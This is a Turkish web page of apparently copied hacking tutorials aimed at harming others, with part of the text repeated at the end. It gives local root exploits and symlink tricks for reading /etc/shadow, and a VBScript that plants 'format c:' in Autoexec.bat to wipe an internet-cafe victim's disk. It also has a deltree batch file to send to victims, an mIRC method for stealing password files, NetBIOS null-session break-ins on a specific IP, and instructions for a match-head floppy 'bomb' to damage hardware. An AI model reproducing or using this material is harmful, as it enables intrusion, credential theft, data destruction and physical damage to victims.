SİTE TASARIM
Daha Fazlası..
OSMAN ER __ ER BİLİŞİM _
www.osmaner.tr.gg
Pc Hacklemek ve Yoları
Daha Fazlası..
İşletim sistemlerin çok kullanıcılı sistemlerde kullanılmaya başlamasıyla birlikte sistemlerde kullanıcıların yetkisi de sözkonusu olmuştur. Kişisel işletim Sistemlerinde (örneğin DOS) sistemi aynı anda tek kullanıcı kullandığı için bütün dosyalara erişebilir, okuyabilir vs. Ancak aynı anda pek çok kişi tarafından kullanısansürlü İşletim sistemlerinde sistemin bir yöneticisi olmak zorundadır ki bu Novell'de supervisor, Unix ve clone'ların da root, NT'de administrator olarak adlandırılır. İşte bu çok kullanıcılı sistemlerde yetkisini artırmak isteyen normal kullanıcılar sistemde daha yetkili hale gelebilmek için "exploit" dediğimiz programlar yazmışlardır. Exploitler işletim sistemi üzerindeki herhangi bir programın eksikliğinden yararlanarak kullanıcıyı daha yetkili hale getirmeye yararlar. Exploitler local ve remote olarak ikiye ayrılır. Local exploitler işletim sisteminin bir kullanıcısıyken uygulanabilir, remote exploitlerde ise sistemin bir kullanıcısı olmanıza gerek yoktur. Sistem açıkları ve bu açıkları kullanmak için yazılmış exploitler günden güne artmakta ve her sistem açığı için patch'ler yazılmakta. Bazı İşletim Sistemleri için örnek exploitler:
"overflow" exploiti (FreeBSD'de lprm açığı): Pointer artimetiğini kullanarak (Pointer değişkenler değişkenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon belleğe (buffer) bir string kopyalayarak taşma oluşturur. Sistemdeki lprm komutunu kullanır. lprm komutu uzaktaki bir yazıcıya gönderilen bir işi iptal etmeye yarar. "lprm -P bloggs" komutuyla iş iptal edilebilirken kuyruktaki ikinci bir iş aynı anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatası meydana getirir. Bu sayede "root" erişimi sağsansürlüır. Lokal bir exploittir.
Derleyici ve /tmp Hataları (Solaris'de gcc tempfile açığı): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde /tmp dizinine (geçici işlemlerin yürütüldüğü dizin. Windows dizini altındaki temp dizini gibi) sembolik link (bir dosyaya ya da dizine ulaşabilmek için konan linkler. Windows'taki .lnk dosyaları gibi) oluşturulur ve bu linkten yararlanarak lokal root hakkı alınır.
Program Hataları (Linux'daki X11Amp Programı açığı): X11Amp çalıştırıldığında ~./X11amp isminde bir dosya oluşturur. Bu hatayı linux'ta şöyle kullanabilirsiniz:
mkdir ~/.x11amp
ln -s /etc/shadow ~/.x11amp/ekl
Bu komutları yazdıktan sonra X11Amp'i çalıştırıp "ekl" 'yi seçin bütün girişleri seçip silin. Program çakılacak ve /etc/shadow dosyasını alabileceksiniz.
Microsoft'un FrontPage Server Extensions'unda karşılaşısansürlü açıklar: Frontpage extensions'un kullanıldığı web sitelerinde pek çok açık bulmak mümkün, örneğin Frontpage 98'de (gerçi eski bir sürüm ama sadece bir örnek) dizin erişim hakları iyi düzenlenmediği için _vti_pvt dizini "WORLD WRITABLE" olarak düzenlenmiş. _vti_pvt dizininde ise "service.pwd" dosyasında şifreler tutulmakta
--
Bug Nedir?
Bug ,kısaca bir işletim sistemi üzerinde bazı hatalı programlar yüzünden meydana gelen sistem açıklığıdır. Bu sistem üzerine kopyalanmış bir oyundan,bir mail programından yada sistem üzerinde ki IRC programından bile meydana gelebilir. Bu hatalar bizim sistem de r00t seviyesine çıkmamızı sağlarlar
Exploit Nedir?
Exploitler , sistemde ki buglar sayesin de r00t seviyesine çıkabilmek için yazılmış programlardır. Exploitler iki şekilde yazılırlar.Local ve Remote.Local exploitleri kullanırken sistemin bir kullanıcısı olmak zorundasınızdır. Fakat remote exploitleri sistem de kaydınız yokken kullanabilirsiniz.
Şimdi bu iki başlığı kavradıktan sonra ,olaya başlıyabiliriz. Gelin Exploit lerle gücümüzü gösterelim )
mount/umount açığından başlayabiliriz mesela,
Sistemde /bin dizinine gidin ve umount yada mount isminde bir dosya arayın.. Eğer bulamadıysanız şu komutu yazabilirsiniz.
find / -name umount -print -xdev
Dosyanın nerde olduğunu bulduğunuzda, o dizine gidip dosyanın özelliklerini görmek için şu komutu yazın,
ls -al um*
Eğer dosyanın sahibi r00t sa ,kesinlikle sistemi kapabiliriz.. Bakalım,
avanak:/bin# ls -al um*
-rwsr-sr-x 1 root 8888 Aug 20 1998 umount
avanak:/bin#
Tamam , artık işler çok çok kolaylaştı. Şimdi işimiz bir exploit e kaldı. Vereceğim exploit sayesinde sistemden takır takır r00t alabileceksiniz Exploit i Download etmek için buraya tık edin(umount.c). Bu exploit i ,sisteme yollayıp orada compile etmelisiniz. Bunu yapmak için şu komutu yazın.
gcc umount.c -o umount (umount yerine istediğiniz ismi yazabilirsiniz)
Gcc komutu sayesinde sistemde umount adında çalıştırılabilir bir dosya yaratıcaksınız..
Not : Eger Exploit çalışmazsa,komutun başına ./ takısını koymayı deneyin. Ve ardından 0 - 8 arası bir sayı ekleyin.Şunun gibi;
./umount 4
yada
./umount 2
Ve sistem elleriniz de ! Artık herşey size kalmış.r00t un neler yapabileceğini anlatmama gerek yok sanırım,
Eğer bu yol işe yaramazsa(ki bu beni bayağı şaşırtır),şimdi anlatıcağım yolu denemeniz gerekicek. En sevdiğim Exploit bu diyebilirim. Çünkü en kolayı ve de şu ana kadar bana hiç sorun yüzü göstermedi. "usr/bin" dizininde splitvt isminde bir dosya arayın.Eğer dosya SUID ise yani sahibi r00t ise, olayı bitti sayabiliriz. Bu exploiti sadece "Linux 2-0.3*" sistemlerde kullanabilirsiniz.
Bakalım bu şey nasıl çalışıyor?
Dosyayı tabiki ilk olarak sisteme yollayın İlk önce değişikliği farketmeniz için "whoami" komutu ile kim olduğunuzu ögrenin.Kullanıcı isminiz ortaya çıkıcak,
1. Dosyayı "gcc" derleyicisi ile exec(çalıştırılabilir) hale getirin, (gcc sp.c sp)
2. Derlediğiniz dosyayı çalıştırın,
3. "splitvt" adlı dosyayı çalıştırın,
İşiniz bittikten sonra yine "whoami" komutunu çalıştırın.O da ne? r00t da kim yahu?
Eheu, bu da çalışmadı diyelim( ki olamaz mümküniyet yok) Tüm Linux dağıtımlarında bulunan bir bug vardır. SendMail bug ı, eğer bugları takip ediyorsanız ,kesinlikle duymuş olmanız lazım. Ben uzun süredir bu bug la ilgilenmiyordum. Belki patch i bile çıkmıştır ..Ama denemek te zarar yok diyorsanız bu kısa exploit i hemen download edin Sisteme yollayın,
Şimdi dosyayı , chmod +x leyin.
chmod +x sm.sh
1 . Dosyayı çalıştırın,
2 . Sizi /tmp dizinine göndericek,
3 . "ls -l" yazın,
4 . Orda SUID bir sh dosyayı olduğunu göreceksiniz,
5 . "whoami" yazıp r00t olup olmadığınıza bakın, eğer değilseniz,
6 . "./sh" yazın, ve şimdi r00t olduğunuzu görebiliceksiniz..
Biraz Linux u birakıp diğer sistemlere göz atalım.Şimdi dalıcağımız sistem bir SunOS.UnixBased bir sistem çok az farklılıkarı var.Mesela SunOS ta "gcc" komutu yerine "cc" komutu kullanılıyor.Fakat bunlara pek ihtiyacımız yok.Çünkü şimdi dalıcağımız sistem de exploit kullanmıyacağız.SunOS taki 3-4 tane bug tan bir tanesi "dtappgather" komutunun bir bug i. Ben daha önceden bunu bilmiyordum.Geçenlerde göz attığımız bir SunOS sistemde SegFault ,sayesinde öğrenmiş oldum.Fakat o sistemde çalışmadı.Neyse fazla söze gerek yok .Başlayalım,
Sistemde "dtappgather" adında bir dosya bulunması lazım,bu genelde /var/dt de bulunuyor.Dosyayı buldunuzsa sorun kalmadı.Bu dosya varsa "generic" de vardır.Tamam şimdi /var/dt/appconfig dizinine girin.
$ ls -al
total 6
drwxr-xr-x 3 root root 512 Feb 3 14:22 .
drwxr-xr-x 5 root root 512 Jun 22 11:08 ..
drwxr-xr-x 4 root root 512 Jun 22 10:24 appmanager
$
"generic" dosyası appmanager adlı dizinin içinde bulunuyor.Şimdi burda yazıcağımız tek bir komut /etc/shadow
dizinindeki unshadowed passwd dosyasını ele geçirmemizi sağlayacak.Komut şu ;
$ ln -s /etc/shadow /var/dt/appconfig/appmanager/generic-display-0
Bunu yazdıktan sonra elimize passwd dosyası geçiyor,artık onu bir Passwd Cracker la kırdıktan sonra elimize r00t un şifreside geçer.
_________________
Öncelikle şunu belirtiim tanımadığın biri pc ye oturacaksa ve sen bu işlemi yapacaksan lamersin ama biri sana yamuk yaptıysa doğal olarak senin de ona yamuk yapman gerekir.
Olaya geçiyoruz diyelim cafedeyiz ve bizden sonra pc ye gıcık olduğumuz kişi oturacak
hemen şu kodları alıyoruz
Coding Forever Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
Eğer girişte açısansürlü kutucukta "Hayır"/"No" tuşuna bastıysanız javascript:reload()">buraya tıklayın ve "Evet"/"Yes"e tıklayın.Bu internet cafede internette daha rahat ve kesintisiz gezebilmeniz için bu işlemi yapmanız gerekir.Lutfen bu işlemi yapınız.Aksi taktirde bilgisayardaki arka plan programlarını kapatmanız veya hızlı bir gezinti yapamazsınız.
bu kodları wordpad ı açıp "cafe.htm" şeklinde bilgisayarım/c/ ye kaydediyoruz.sağ tık > özellikler diyoruz ve "gizli" seçeneğini seçiyoruz. zamanlamış görevlere gidiyoruz ve 10 dk sonra pc den kalkacaksak 20 dk sonraya bilgisayarım/c/cafe.htm yi açtırıyoruz. pc den kalkıyoruz. gıcık olduğumuz adam pc ye oturuyor bir ileti alıyor evet diyor ve pc formatlanıyor
Disket Bombası Yapımı
Disket Bombasi Yapimi
Bu olayda ,sistem söle islioR; disket i takti kuRban....disket okunmaya basliyoR,kisa biR süRe içinde floppy nin içinde biR parlama (ufak patlama)meydana gelecek ve muhtemelen floppy bozulcak,ve bazi parçalaR eRicek(baska donanimlaRa bile zaRaR veRebilir)...kurban bunun disketten kaynaklandiini asla düsünmez çünkü biR disket niye patlasinki...o olayi biR güç kaynagi pRoblemi ya da kisa devRe filan sanicaktir...yani olay sanildigi gibi disketle viRüs ya da trojan yayma degil, olay diRek fiziksel hasar veRme olayi...
GEREKENLER :
- 1 adet 3½ inç disket
- beyaz ya da mavi uçlu kibRit (bu RenkleRden olmak zoRunda,kaçak sigaRa satanlaRdan ya da ameRikan pazaRlarindan edinilebiliR)
- seffaf tiRnak cilasi (bu madde hakkindaki teknik bilgiyi ,kiz arkadasinizdan,ablanizdan ya da annenizden alabiliRsiniz,onlaR biliR bunun ne olduunu)
YAPILIS :
Ilk önce kibritleRin uçlarini kaziyoRuz ve bu uçlaRi biR havana ya da saglam bi kahseye koyuyoRuz..bu kahsede ya da havanda bunlari tahta biR davayla bi güzel ezioRuz,toz haline getiRioRuz...kibrit uçlaRini kazirken ve onlari havanda ezeRken ****l bisey kullanmayin kibRit tozlaRi ates alabiliR,bosa gideR ,bidaha ayni islemi yapmak zoRunda kaliRsiniz...
Baya bi tozumuz olduktan soRa;
disketi dikkatlice açioRuz(kirmadan-çünkü geri kapaticaz ileRide)...üsteki pamuk gibi olan koRuyucu zimbiRtiyida çikaRtioRuz...
daha soRa;
filmden yapilmis olan davanin (ufak cd boyutunda filmden yapilmis siyah esnek zimbiRti) üzeRine tozumuzu esit olaRak yayiyoRuz..(spymastersnake.org).soRa tirnak cilasini kbiRit tozunun üzeRine yayin (süRün)... ve kurumaya biRakin...soRa disketi açtiimiz gibi tekRar kapicaz,baglanti noktalaRina tirnak cilasindan biRaz süRüp kapayabiliRsiniz (yapistiRici ayagina)...
islem tamam,simdi bu disketi,ya biRine veRin ,ya sekli ayni olan biR disketle deistiRin çaktirmadan...kuRban disketi floppy e taktiginda,süRücü FDD kafasi disketi okumayi deniycek ve kisa biR süRe içinde olanlaR olucak
NOT: bu yöntemle baskalarinin PC sine zaRaR veRenleR yaptiklaRindan kendileRi soRumluduR, sorumluluk kabul etmioRum...
NOT2 : ancak heR yeRde patlayan disketleRin dolasmasi ve ufak kaRgasalaRin yasanmasi hosuma gideR dogrusu
_________________
_________________
MİRC İLE PC HAK
Bu yöntemle karşı taraftan dosya aktarımı yapabilirsiniz. Ancak dosya silemezsiniz. Fakat bizim işimizede yarayacak olan *.pwl dosyaları. tabi sizin kişisel istekeriniz varsa onlarıda download etmeniz mümkün.
Şimdi karşı taraftaki muhabbet ettiğiniz kişiye
//fserve nikiniz magtext rootdirectory welcomefile
Bu komutta yerine oturan şeyleri yazdırmanız gerekir. Bunları biraz açıklayacak olursam.
Nickname: Sizin nickiniz
Magtext: Aynı anda kaç dosya çekebileceğinizi belirten bölümdür.
Root Directory: Karşı tarafın bilgisayarında erişeceğiniz dizini belirtir. Mesela "C:WINDOWS" gibi...
Welcome File: Bu son derece gereksiz. Ama böyle bir parametrede var ve bende bunu açıkayim dedim. Buda siz PCye eriştiğiniz zaman sizi karşılayacak text dosyasıdır.
Şimdi komutu bir örnekle açıklayalım.. Mesela bilgisayarına girmek istediğimiz kişinin nicki "Yanliz_Ve_Mutlu" olsun bizim nickimizde Virus "Yanliz_Ve_Mutlu" Kullanıcısına şu komutu yazdırmayı başarmanız gerekir.
//Fserve Virus 10 C:WINDOWS TRhc.txt
Şimdi burda "Yanliz_Ve_Mutlu" Virus nickinin C:WINDOWS dizinine girmesine izin veriyor. Ve dizinden 10 dosya download edebilmesine izin veriyor. Böylece Virus nickine sahip kullanıcının *.PWL dosyalarına erişebilmesinide sağlamış oluyor.
Evet buraya kadar kullanıcıya yazdırmanız gereken komutu anlattım.. Şimdide bunu Script yazarları için bir nevi server dosyası haline dönüştürmek için gerekli komutlara bakalım.. Hatırlarsanız eskiden Dragon ve Solucan scriptlerde basit bir "Remote Control" sistemi vardı. Sizde daha gelişmiş birşeyler yazabilirsiniz.
ON 1:TEXT:*TurkHackerCenter:?: {
if ($nick == Virus) { /fserve virus 10 C: debug.txt | /close -m virus }
else HALTDEF
}
Yukardaki komutta gördüğünüz şeyin açıklaması şudur. Siz Virus nickine sahipsiniz ve sizin scriptinizi kullanan bir kullanıcı var onun bilgisayarına erişmek için ona "TurkHackerCenter" yazısını gönderiyorsunuz. Sonrada o size C: dizini için giriş veriyor. Tabi sizin pencerenizi hemen kapatıyor ve şifrenin kullanıcının eline geçmesini engelleiyor. Böylece sizde sadece kendinize özel bir sistemin güvenliğini sağlamış oluyorsunuz. Tabi en en kolay komutu verdim. Bunu geliştirip kişisel uyarlamalarla daha güvenli hale falan getirmenizde mümkün..
Yanlız unutmayınki.. Kurbanın sizin girmenize izin verdiği dizinden daha alt dizinlere geçemezsiniz. Fakat daha yukarılara çıkabilirsiniz. Bunu bir örnekle açıklayacak olursam şöyle anlatabilirim. Mesela Kullanıcı size "/fserve virus 10 C:WINDOWS debug.txt" komutuNU Kullanarak geçiş verdi. Bu komuttan sonra C:WINDOWSSystem32 dizinine geçebilirsiniz. ama C: dizinine inemezsiniz.
Ayrıca dizin değiştirmek dosyaları download etmek için bazı komutlar var onlarda şöyle..
CD "Directory": Dizin değiştirmenizi sağlayan komut
Exit: Çıkış
Get "filename": Dosyaları indirmek için kullanılır. (Uzantısıyla birlikte yazılır)
Help: Yardım
Ls: Dizindeki dosyaları listeler.
Bundan sonrası size kalmış dizin değiştirip *.PWL dosyalarını kendi bilgisayarınıza aktarın sonrada PWL Crackerlarla kırın ve istediğiniz şifreyi alın.. Hatta size PWL Şifrelerini çözmek için PWL Toolr programınıda tavsiye edebilirim.
_________________
Kanser bir bilgisayar bağlantı programıdır.Kanser ile girdiğiniz bilgisayarda cd-romla oynayabilirsiniz, ses çıkarıp deli edebilir siniz,Bilgisayara reset atabilirsiniz (çok eğlenceli oluyor),masaüstünü görebilirsiniz, istediğiniz programı çalıştırabilirsiniz(keylogger vb. dahil),İstediğiniz dosyayı çeke bilirsiniz,karşı tarafa mesaj yollayabilirsiniz vs..
Kanser ne işe yarar?
Kanser'le serveri yedirdiğiniz bilgisayara girebilirsiniz.İster eğlenip ister endüstri yel casusluk yapabilirsiniz.
Alttaki linklerden programla ilgili
@echo off
C:WINDOWSCOMMANDdeltree /y c:windows*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:*.*
@echo off
cls
cls
@echo .::TÜRK HACK BİRLİĞİ::.
@echo off
bu kodları kopyalayın,not defterine yapıştırın farklı kaydet deyin adını öreneğin:HACKERİZ yapçaksın HACKERİZ.bat diye kaydet sonra msn den filan bir yerden yolla adam formatı yesin(bilgisayar çöksün)
_________________
_NOT 98 İŞLETİM SİSTEMLERİNDE ÇALIŞIR________________
XP bilgisayara girme
--------------------------------------------------------------------------------
Size cok basit ama gercekten ise yariyan bi sistemden bahsetcem.
eger girmek istediginiz pc'de network mevcutsa yada paylasim varsa
basarili olursunuz öncelikle girmek istediginiz pcnin ip adresini bilmeniz
gerekiyor.
bu yontemle butun internete baglana pc'lere baglanabilirsiniz.
ama ben sadece xpde denedim. 98de nasil oluo bilmiyorum deneyin belki 98 de olur.
yani 98 derken kullandindiginiz pc 98. benim pc xp. ve xp ile butun internete
baglana pclere dalabiliyorum. 98/xp/nt/me/2000/
bence çok saglam ve guzel birşey.
Şimdi bağzı arkadaslar bana demistiki bu olayi Angry Ip Scanner ile de
yapabilirsin
hem orada daha kolay. sadece ip yaziosun giriosun diye.
bende diyorumki bu sistem network sifresi bilinmeyen server'ler icin gecerlidir.
yani ipscanner ile ftpden girdiginiz ve
karsiniza sifre cikti naaparsiniz.
simdi diiceksinizki R3x ile kirariz sifreyi. bende kiramazsiniz derim.
farzedin ki adam "1356as78ad6a5s41z" diye bi sifre kurmus. siz bu sifreyi
R3x ile ve normal dial-up ttnet baglanti ile 200 gunde anca cozersiniz
benim uyguladigim sistem ile sifreyi kiriyoruz..
neyse ben anlatiyim..
simdi "new view" komutu herhangi bi pc'nin paylasimlarini listelio.
biz pc'nin 139. portundan sizacaz pc'ye. cunku bi turlu 139. porttan iceri sizmayi
kapatamadi.
Oncelikle Baslat/Calistir(Start/Run)'a girip "cmd" yaziyoruz. //veya command
Daha sonra cikan ekrana "net view ipadresi" yaziyoruz. ornek :"net view
213.197.212.131"
// 213.197.212.131 adresi suan girdigim server
not : arkadaslar ben Xp isletim sisteminde yaptim. 98de oluyomu bilmiyorum
ama denersiniz. yani net view 98de varmı bilmiorum.
neyse "net view ipadresi" komutunu denedikten sonra buyuk bir ihtimal
aynen boole bi yazi cıkar
++++++++++++++++++++++++++++++++
C:>net view 213.197.212.131
5 sistem hatası oldu.
Erişim Engellendi
C:>_
++++++++++++++++++++++++++++++++
ahanda aynen bunlarin yazmasi gerekiyor. bunun anlami sudur. sisteminize baglanilmadan
buna izin verilmeyecegidir. NETBIOS sisteminin komik tarafi bos bi user ve pass girsek
bilem pc buna izin verio. yani aynen boole bisi yazmamis gerekio. sisteme admin
olarak girmek icin
C:>net use 213.197.212.131ipc$ /u:"" ""
Komut başarıyla tamamlandı.
yani yukarıda gördüğümüz C:>net use 213.197.212.131ip$ /u:"" "" komutunu
uygulayinca cikio
ve ilerliyoruz.
net use : herhangi bi pc'ye yada paylasima baglanir.
ipc$ : uzaktan baglantilarla alakali bir gizli paylasim.
/u "user" "sifre" :kullanici adi ve sifre belirtir.
neyse devam edelim. sonuc olarak komut basariyla tamamlandi mesaji gelecektir.
bizde bundan onceki gibi net view 213.197.212.131 komutunu uygulayarak paylasimlari
listeleyecegiz. yani ilk once paylasima girdik admin olarak sonra tekrar listeledik.
---------------------------------------------------
C:>net view 213.197.212.131
213.197.212.131 konumundaki paylasilan kaynaklar
tah*****
Disk >http://www@root Disk
ShareDocs Disk
komut basariyla tamamlandi.
C:>
---------------------------------------------------
bööle bi yazi gelcek tabi ben Atladim bazi yerleri yoksa ortalik karisir. ve
http://www@root sharedDocs karsi pcde
bulunan part'lardir.
bu sekilde acmis olacaksiniz sistemi
. ve ne yazikki acmis oldugunuz serveri kisitli
olarak kullanabileceksiniz bu sekilde. cunku siz paylasimi saltokunur olarak actiniz.
yani ilk acilista boole oluo da ondan.
amacimiz administrator olarak girmek.
simdi farzedinki siz xp kullaniyosunuz. ve naparsaniz yapın sizin paylasim listeniz
olmasa
bile bu hackerlere uyari verecektir "karsi pcde paylasim listesi yok" diye. tabii
bu yine
hackerleri durdurmaz hehe. cunku windows xp/nt/2000 sistemleri sizin haberiniz
olmadan pc'nize
tanimli olan suruculeri otomatik olarak paylasimlari acar. bu paylasimlar default
olarak
gizlidir ve ve administrator haric uzaktan
hickimse tarafindan gorunmez. eger hacker NULL
yerine admin sifresi ile sisteminize girerse yani daha onceden sifreyi cozmus ise.
yandiniz ) walla degil normal pc koca servere bunlarin hicbirini yapmadan
girebilir şifre varsa
.
sadece net view 213.197.212.131ipc$ u/:"user" "pass" yapip ucabilir
servere ) tabi
farkli admin komutları daha var. sifreyi bilirseniz.
neyse biz adamin pc'sine ulasinca farkli kullanici olurturmamiz gerekio tam erisim
saglamak icin
yani. bunun icin
kullanmis oldugumuz oturumu silcez.
---------------------------------
c:>net use 213.197.212.131ipc$ /delete
213.197.212.131
...admin
basariyle silindi
.
---------------------------------
diye bi msj gelcek. tabi üstteki komutu uygulayinca
bizde hemen zaman kaybetmeden.
----------
c:>net use 213.197.212.131ipc$ u:"The_BeKiR" "abc"
komut basari ile tamamlandi.
----------------------------------
diycez. amaaa biz komutu uygulayinca //not : "The_BeKiR" ve "abc"
yerine ne yasiosaniz
yazin birincisi user ikincisi passwd olcak ama.
isteeee. bu kadar bundan sonrasi tamamen sizin insafiyetinize kalio
ben zarar vermeden sadece bikac dosya kopyaladim. siz naaparsiniz bilmiorum.
tabi siz ilk once gizli paylasimlara girmek istersiniz bi de yani paylasim veren
surucuye hani adminden baska kimsenin giremedigi surucuye
onun icinde
---------
c:> net use x: 213.197.212.131c$
diyecez ve holey. koca bilgisayardayiz
burada
x: ag surucusunun adini belirtio
c$: surucuyu belirtio eğer d: varsa d$ yaparsiniz.
$ simgeside gizli olan partition'u yani adminin girebildigi surucuyu
temsil edio.
---
son olarak x sürücüsü üzerinde istediğiniz her şeyi uygulayabilirsiniz
dos komutlarının hepsini yani. mesela ben x:>mkdir The_alexandanelka diye klasör
açtim
BİR TESEKKURU COK GORMEYİN
BİLGİLER ALINTIDIR....
"overflow" exploiti (FreeBSD'de lprm açığı): Pointer artimetiğini kullanarak (Pointer değişkenler değişkenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon belleğe (buffer) bir string kopyalayarak taşma oluşturur. Sistemdeki lprm komutunu kullanır. lprm komutu uzaktaki bir yazıcıya gönderilen bir işi iptal etmeye yarar. "lprm -P bloggs" komutuyla iş iptal edilebilirken kuyruktaki ikinci bir iş aynı anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatası meydana getirir. Bu sayede "root" erişimi sağsansürlüır. Lokal bir exploittir.
Derleyici ve /tmp Hataları (Solaris'de gcc tempfile açığı): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde /tmp dizinine (geçici işlemlerin yürütüldüğü dizin. Windows dizini altındaki temp dizini gibi) sembolik link (bir dosyaya ya da dizine ulaşabilmek için konan linkler. Windows'taki .lnk dosyaları gibi) oluşturulur ve bu linkten yararlanarak lokal root hakkı alınır.
Program Hataları (Linux'daki X11Amp Programı açığı): X11Amp çalıştırıldığında ~./X11amp isminde bir dosya oluşturur. Bu hatayı linux'ta şöyle kullanabilirsiniz:
mkdir ~/.x11amp
ln -s /etc/shadow ~/.x11amp/ekl
Bu komutları yazdıktan sonra X11Amp'i çalıştırıp "ekl" 'yi seçin bütün girişleri seçip silin. Program çakılacak ve /etc/shadow dosyasını alabileceksiniz.
Microsoft'un FrontPage Server Extensions'unda karşılaşısansürlü açıklar: Frontpage extensions'un kullanıldığı web sitelerinde pek çok açık bulmak mümkün, örneğin Frontpage 98'de (gerçi eski bir sürüm ama sadece bir örnek) dizin erişim hakları iyi düzenlenmediği için _vti_pvt dizini "WORLD WRITABLE" olarak düzenlenmiş. _vti_pvt dizininde ise "service.pwd" dosyasında şifreler tutulmakta
--
Bug Nedir?
Bug ,kısaca bir işletim sistemi üzerinde bazı hatalı programlar yüzünden meydana gelen sistem açıklığıdır. Bu sistem üzerine kopyalanmış bir oyundan,bir mail programından yada sistem üzerinde ki IRC programından bile meydana gelebilir. Bu hatalar bizim sistem de r00t seviyesine çıkmamızı sağlarlar
Exploit Nedir?
Exploitler , sistemde ki buglar sayesin de r00t seviyesine çıkabilmek için yazılmış programlardır. Exploitler iki şekilde yazılırlar.Local ve Remote.Local exploitleri kullanırken sistemin bir kullanıcısı olmak zorundasınızdır. Fakat remote exploitleri sistem de kaydınız yokken kullanabilirsiniz.
Şimdi bu iki başlığı kavradıktan sonra ,olaya başlıyabiliriz. Gelin Exploit lerle gücümüzü gösterelim )
mount/umount açığından başlayabiliriz mesela,
Sistemde /bin dizinine gidin ve umount yada mount isminde bir dosya arayın.. Eğer bulamadıysanız şu komutu yazabilirsiniz.
find / -name umount -print -xdev
Dosyanın nerde olduğunu bulduğunuzda, o dizine gidip dosyanın özelliklerini görmek için şu komutu yazın,
ls -al um*
Eğer dosyanın sahibi r00t sa ,kesinlikle sistemi kapabiliriz.. Bakalım,
avanak:/bin# ls -al um*
-rwsr-sr-x 1 root 8888 Aug 20 1998 umount
avanak:/bin#
Tamam , artık işler çok çok kolaylaştı. Şimdi işimiz bir exploit e kaldı. Vereceğim exploit sayesinde sistemden takır takır r00t alabileceksiniz Exploit i Download etmek için buraya tık edin(umount.c). Bu exploit i ,sisteme yollayıp orada compile etmelisiniz. Bunu yapmak için şu komutu yazın.
gcc umount.c -o umount (umount yerine istediğiniz ismi yazabilirsiniz)
Gcc komutu sayesinde sistemde umount adında çalıştırılabilir bir dosya yaratıcaksınız..
Not : Eger Exploit çalışmazsa,komutun başına ./ takısını koymayı deneyin. Ve ardından 0 - 8 arası bir sayı ekleyin.Şunun gibi;
./umount 4
yada
./umount 2
Ve sistem elleriniz de ! Artık herşey size kalmış.r00t un neler yapabileceğini anlatmama gerek yok sanırım,
Eğer bu yol işe yaramazsa(ki bu beni bayağı şaşırtır),şimdi anlatıcağım yolu denemeniz gerekicek. En sevdiğim Exploit bu diyebilirim. Çünkü en kolayı ve de şu ana kadar bana hiç sorun yüzü göstermedi. "usr/bin" dizininde splitvt isminde bir dosya arayın.Eğer dosya SUID ise yani sahibi r00t ise, olayı bitti sayabiliriz. Bu exploiti sadece "Linux 2-0.3*" sistemlerde kullanabilirsiniz.
Bakalım bu şey nasıl çalışıyor?
Dosyayı tabiki ilk olarak sisteme yollayın İlk önce değişikliği farketmeniz için "whoami" komutu ile kim olduğunuzu ögrenin.Kullanıcı isminiz ortaya çıkıcak,
1. Dosyayı "gcc" derleyicisi ile exec(çalıştırılabilir) hale getirin, (gcc sp.c sp)
2. Derlediğiniz dosyayı çalıştırın,
3. "splitvt" adlı dosyayı çalıştırın,
İşiniz bittikten sonra yine "whoami" komutunu çalıştırın.O da ne? r00t da kim yahu?
Eheu, bu da çalışmadı diyelim( ki olamaz mümküniyet yok) Tüm Linux dağıtımlarında bulunan bir bug vardır. SendMail bug ı, eğer bugları takip ediyorsanız ,kesinlikle duymuş olmanız lazım. Ben uzun süredir bu bug la ilgilenmiyordum. Belki patch i bile çıkmıştır ..Ama denemek te zarar yok diyorsanız bu kısa exploit i hemen download edin Sisteme yollayın,
Şimdi dosyayı , chmod +x leyin.
chmod +x sm.sh
1 . Dosyayı çalıştırın,
2 . Sizi /tmp dizinine göndericek,
3 . "ls -l" yazın,
4 . Orda SUID bir sh dosyayı olduğunu göreceksiniz,
5 . "whoami" yazıp r00t olup olmadığınıza bakın, eğer değilseniz,
6 . "./sh" yazın, ve şimdi r00t olduğunuzu görebiliceksiniz..
Biraz Linux u birakıp diğer sistemlere göz atalım.Şimdi dalıcağımız sistem bir SunOS.UnixBased bir sistem çok az farklılıkarı var.Mesela SunOS ta "gcc" komutu yerine "cc" komutu kullanılıyor.Fakat bunlara pek ihtiyacımız yok.Çünkü şimdi dalıcağımız sistem de exploit kullanmıyacağız.SunOS taki 3-4 tane bug tan bir tanesi "dtappgather" komutunun bir bug i. Ben daha önceden bunu bilmiyordum.Geçenlerde göz attığımız bir SunOS sistemde SegFault ,sayesinde öğrenmiş oldum.Fakat o sistemde çalışmadı.Neyse fazla söze gerek yok .Başlayalım,
Sistemde "dtappgather" adında bir dosya bulunması lazım,bu genelde /var/dt de bulunuyor.Dosyayı buldunuzsa sorun kalmadı.Bu dosya varsa "generic" de vardır.Tamam şimdi /var/dt/appconfig dizinine girin.
$ ls -al
total 6
drwxr-xr-x 3 root root 512 Feb 3 14:22 .
drwxr-xr-x 5 root root 512 Jun 22 11:08 ..
drwxr-xr-x 4 root root 512 Jun 22 10:24 appmanager
$
"generic" dosyası appmanager adlı dizinin içinde bulunuyor.Şimdi burda yazıcağımız tek bir komut /etc/shadow
dizinindeki unshadowed passwd dosyasını ele geçirmemizi sağlayacak.Komut şu ;
$ ln -s /etc/shadow /var/dt/appconfig/appmanager/generic-display-0
Bunu yazdıktan sonra elimize passwd dosyası geçiyor,artık onu bir Passwd Cracker la kırdıktan sonra elimize r00t un şifreside geçer.
_________________
Öncelikle şunu belirtiim tanımadığın biri pc ye oturacaksa ve sen bu işlemi yapacaksan lamersin ama biri sana yamuk yaptıysa doğal olarak senin de ona yamuk yapman gerekir.
Olaya geçiyoruz diyelim cafedeyiz ve bizden sonra pc ye gıcık olduğumuz kişi oturacak
hemen şu kodları alıyoruz
Coding Forever Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
